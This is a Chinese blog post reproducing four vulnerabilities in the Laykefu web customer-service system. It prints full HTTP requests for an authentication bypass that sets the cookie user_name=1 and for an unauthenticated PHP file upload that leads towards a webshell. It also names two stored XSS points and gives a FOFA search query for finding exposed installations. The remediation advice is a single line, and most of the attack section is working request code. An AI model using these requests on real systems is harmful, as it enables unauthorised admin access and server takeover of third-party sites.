【复现】Laykefu客服系统后台漏洞合集_29

已于 2024-01-26 20:19:31 修改
阅读量1.9k 收藏 7
点赞数 42
分类专栏: 安全漏洞 文章标签: 安全 web安全 系统安全 网络安全
于 2024-01-26 20:17:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fushuang333/article/details/135873580
版权
文章详细描述了Laykefu客服系统的四个安全漏洞,包括逻辑漏洞、文件上传、XSS攻击,以及如何复现。提出增加前后端验证的修复建议,并提到了使用fossa进行搜索的技巧。同时包含了免责声明,强调责任归属和合法使用信息的重要性。
摘要由CSDN通过智能技术生成

目录

一.概述

二 .漏洞影响

三.漏洞复现

1. 漏洞一:

2. 漏洞二:

3. 漏洞三:

4. 漏洞四:

四.修复建议:

五. 搜索语法:

六.免责声明

一.概述

Laykefu客服系统是thinkphp5+Gatewayworker搭建的web客服系统

详情看系统介绍

二 .漏洞影响

获取管理员权限,可上传文件,获取webshell等

三.漏洞复现

1. 漏洞一:

(1)漏洞类型:  逻辑漏洞

(2)请求类型:POST

(3)复现

找到相关系统页面

使用cookie-editor插件,或者burp抓包后,添加一个cookie值user_name = 1

burp请求

修改完之后,直接访问/admin可以登录进后台

burp请求包

GET /admin HTTP/2
Host: 
Cookie: user_name=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
secure-Requests: 1

2. 漏洞二:

(1)漏洞类型:  文件上传

(2)请求类型:POST

(3)复现

漏洞点在后台的添加客服

前端是存在验证的

使用burp抓包,修改1.jpg文件名的后缀为PHP

添加内容为<?php echo test1;?>

拦截响应即可看到返回的上传路径

前端元素也可看见

请求包

POST /admin/users/upavatar.html HTTP/2
Host: 
Cookie: user_name=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------243230035635601658051378961973
Content-Length: 238
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------243230035635601658051378961973
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg

<?php echo 1234;?>
-----------------------------243230035635601658051378961973--

3. 漏洞三:

(1)漏洞类型:  XSS

(2)请求类型:POST

(3)复现

漏洞点在后台添加常用语,找到后台常用语管理的添加常用语,插入payload,并提交

提交后,点击常用语列表会弹出XSS

4. 漏洞四:

(1)漏洞类型:  XSS

(2)请求类型:POST

(3)复现

漏洞点在后台添加管理员,具体过程和漏洞三相似,就不做演示了

四.修复建议:

增加前后端验证

五. 搜索语法:

1.fofa

icon_hash="-334624619"

六.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

穿着白衣
关注
专栏目录
漏洞复现Laykefu客服系统任意文件上传
失心少年
03-09 298
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用此问题,上传后门文件,获取服务器权限。
Laykefu客服系统 任意文件上传漏洞复现
0xSec
01-21 950
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用此问题,上传后门文件,获取服务器权限。
Laykefu客服系统后台登录绕过
2301_80127209的博客
02-07 304
Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台,恶意攻击者可利用此漏洞获得后台权限。
Laykefu Web客服系统安装与配置指南
最新发布
gitblog_00768的博客
09-26 560
Laykefu Web客服系统安装与配置指南 laykefu thinkphp5+workerman+gatewayworker搭建的webim客服系统/即时通讯 项目地址: https://gitcode.com/gh_mirr...
客服系统上传漏洞导致服务器被拿下(续)
weixin_30466953的博客
12-16 1245
上次说到我们的服务器因为这个客服系统被拿下后,我们在服务器后台进行了木马查杀,结果杀出了不少木马,但经过筛选之后,真正能执行的只有2个,查看这两个木马的创建时间,一个是3天前,也就是白帽子第一次尝试跟我们联系的时间点,而另外一个创建时间居然是几年前,在百思不得其解的情况下我们向这位白帽子进行了确认,他说自己只传了一个木马,另外一个绝对不是他的,话说回来,我们的客服系统才...
(新接口)用友NC某接口存在任意文件读取漏洞-0day
weixin_43167326的博客
02-22 1664
用友NC是一款企业级ERP(企业资源计划)软件,它提供了全面的财务、人力资源、采购、销售、生产等各种业务管理模块,适用于中小型企业和大型集团公司。用友NC具有良好的可扩展性和可定制性,可以满足企业在不同行业和不同规模下的管理需求。该系统基于Java EE技术开发,具有跨平台、集成度高、业务流程自动化、信息共享等特点,能够有效提高企业的管理效率和降低成本,是众多企业的首选管理软件。。
Laykefu客服系统任意文件上传漏洞
qq_36334672的博客
01-25 590
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用此问题,上传后门文件,获取服务器权限。
Laykefu客服系统 任意文件上传漏洞,为什么网络安全要采用Binder作为IPC机制
m0_60607675的博客
04-05 727
2、访问info:name: Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞 而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台 恶意攻击者可利用此问题 上传后门文件 获取服务器权限metadata:variables:?
客服系统上传漏洞导致服务器被拿下
weixin_30852451的博客
12-16 1143
今天收到某白帽子报告说通过某漏洞把我们的服务器拿下了,一下子让已经忙碌不堪的我更加忙碌了,在这里就只做简单的总结: 1、 原因:YS使用的某kf系统存在上传漏洞,在网上没有搜到任何信息,可能是0day,也可能是未公开的(漏洞细节暂不公开)。 2、 危害:白帽子通过该漏洞上传木马拿下了我们的kf服务器。 3、 风险分析:由于该业务相对独立,且用到了第三方小厂商的软件,当初就感觉风...
复现】帮管客CRM 客户管理系统 sql注入漏洞_37
fushuang333的博客
02-02 890
复现】帮管客CRM 客户管理系统 sql注入漏洞,​ 攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
laykefu:thinkphp5 + workerman + gatewayworker构建的webim客服系统即时通讯
03-11
莱克夫 thinkphp5 + Gatewayworker建造的web客服系统 体验地址: ://www.laykefu.com 客服地址: //www.laykefu.com/service帐户密码:客服小美123456 后台管理地址: ://www.laykefu.com/admin帐户密码:暂不提供 github仓库: : 1.客户端接入 1,添加laykefu.css样式文件 <link href= "你的域名/static/customer/css/laykefu.css" rel= "stylesheet" type= "text/css" /> 2,添加jquery.js和laykefu.js文件 [removed][removed] <
漏洞复现】NUUO NVR 摄像机 __debugging_center_utils___.php 命令执行漏洞
alert['Hello World']
07-27 526
NUUO NVR是中国台湾省NUUO公司旗下的一款网络视频记录器。能够适应不同的应用场景。并且是一个易于安装和可靠的系统,允许用户轻松和简单地配置和管理网络摄像机。NUUO 网络摄像头 __debugging_center_utils___.php 存在命令执行漏洞,攻击者可以通过这个漏洞在服务器上执行任意命令,完全控制权,进行非法操作、窃取和篡改敏感数据,甚至完全接管服务器,给系统安全性带来严重威胁。
漏洞复现】网神 SecGate 3600 防火墙 sys_export_conf_local_save 任意文件读取
alert['Hello World']
07-08 375
网神SecGate3600下一代极速防火墙(NSG系列)是基于完全自主研发、经受市场检验的成熟稳定网神第三代SecOS操作系统 并且在专业防火墙、VPN、IPS的多年产品经验积累基础上精心研发的高性能下一代防火墙 专门为运营商、政府、军队、教育、大型企业、中小型企业的互联网出口打造的集防火墙、抗DDoS攻击、VPN、内容过滤、IPS、带宽管理、用户认证等多项安全技术于一身的主动防御智能安全网关。
Create Laykefu客服系统任意文件上传漏洞(含批量验证poc)
2401_84411323的博客
04-17 695
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
thinkphp5在线客服系统如何搭建
mingyuexingzuo的博客
12-04 568
thinkphp5在线客服系统下载好了如何搭建呢?这里以宝塔为列子来演示,首先上传到宝塔网站下解压。网站伪静态配置,宝塔默认有tp框架的伪静态规则。安装数据库,导入数据库文件。然后就是改掉连接数据库账号密码。 更改代码,准备工作完毕 还需要改js的地方。laykefu.js 最底部代码,改成你自己的ip地址+端口。 启动gatawayworker相关服务 如果你是在windows上运行的话,直接双击/vendor/workerman/Conf/start_for_bat.bat即可 如果你是在
【二开版】大魔王7.0-PHP来客云在线客服系统
C站全栈优质创作者、阿里云受邀博主专家,喜欢结识新伙伴寻找志同道合的朋友,欢迎一起探讨学习
08-04 5528
以上就是今天的【二开版】大魔王7.0-PHP来客云在线客服系统,如需下载请在文章首页下载资源,如果需要搭建指导请联系我,有偿安装🍋希望你能喜欢我的其他作品《记一次云之家签到抓包》《记一次视频抓包m3u8解密过程》《抓包部分软件时无网络+过代理检测 解决办法 安卓黄鸟httpcanary+vmos》《Python】记录抓包分析自动领取芝麻HTTP每日免费IP(成品+教程)》《某课抓包视频 安卓手机:黄鸟+某课app+VirtualXposed虚拟框架》《Python爬虫脚本项目实战》
php常见漏洞
qq_36232967的博客
06-20 534
此外,及时更新和修复依赖组件和框架也是保持应用程序安全的关键。会话劫持和固定:会话劫持是指攻击者窃取有效用户会话标识符,然后冒充合法用户访问系统。会话固定是指攻击者在不合法获取会话标识符的情况下,通过伪造会话标识符欺骗服务器信任他们。文件包含漏洞:文件包含漏洞出现在代码中使用用户可控参数来加载外部文件的情况下,攻击者可以通过构造恶意路径或文件名来加载任意文件并执行其中的代码,从而导致服务器被入侵。跨站脚本攻击(XSS):XSS 漏洞是指攻击者通过在网页中注入恶意脚本,从而在用户浏览器中执行恶意代码。
tomcat弱口令登入后台漏洞复现
07-13
Tomcat弱口令漏洞通常指的是服务器未正确配置导致管理员账户使用了默认或过于简单的密码,容易被攻击者利用来进行未经授权的访问。复现这种漏洞通常需要以下步骤: 1. **查找漏洞信息**:首先确认该Tomcat版本是否存在已知的弱口令漏洞,这通常可以在安全公告、官方文档或漏洞数据库(如CVE)中找到。 2. **目标环境设置**:确定你的目标Tomcat服务器的IP地址、端口号以及默认管理界面路径(通常是`http://<ip>:8080/manager/html`),同时检查用户名和密码是否可以用默认值(如admin或空白)尝试登录。 3. **尝试登录**:使用工具(如burp suite、nmap等)或直接浏览器输入上述信息进行登录,如果使用的是默认或弱密码,可能会成功登录。 4. **验证漏洞**:登录后查看权限,如能够修改配置文件或管理系统,就说明可能存在弱口令漏洞。 5. **修复措施**:一旦确认漏洞存在,应立即更改管理员密码,并确保设置复杂的密码策略,禁用默认用户,或者安装安全补丁以防止此类漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

穿着白衣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值